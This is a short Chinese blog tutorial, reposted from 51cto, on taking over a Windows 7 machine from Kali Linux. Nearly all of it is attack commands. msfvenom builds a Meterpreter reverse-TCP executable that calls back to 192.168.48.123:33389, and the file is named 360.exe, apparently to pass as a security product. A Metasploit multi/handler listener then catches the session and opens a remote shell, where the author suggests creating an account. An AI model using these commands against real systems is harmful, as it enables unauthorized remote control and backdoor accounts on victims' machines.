写***文件,并赋予权限

[email protected]:~#msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.48.123 lport=33389 -f exe > 360.exe
[email protected]:~#chmod 777 360.exe


配置网络信息

开启PostgreSQL:  service postgresql start
开启metasploit:  service metasploit start

[email protected]:~# msfconsole

kali之***Win7系统1

msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.48.123
msf exploit(handler) > set lport 33389
 msf exploit(handler) > exploit -z -j
msf exploit(handler) > sessions
msf exploit(handler) > sessions -i 1

kali之***Win7系统1

meterpreter > shell 进入shell里可以在此处创建账户密码

kali之***Win7系统1

查看系统信息,用户权限

kali之***Win7系统1


kali之***Win7系统1


本文出自 “马广杰——博客” 博客,转载请与作者联系!


转载于:https://blog.51cto.com/losering/1943658

相关文章:

  • 2021-04-03
  • 2021-10-09
  • 2021-11-22
  • 2021-05-11
  • 2021-11-08
  • 2022-12-23
  • 2021-12-24
猜你喜欢
  • 2021-05-31
  • 2022-01-15
  • 2021-05-20
  • 2022-12-23
  • 2021-06-12
  • 2022-01-02
  • 2021-05-16
相关资源
相似解决方案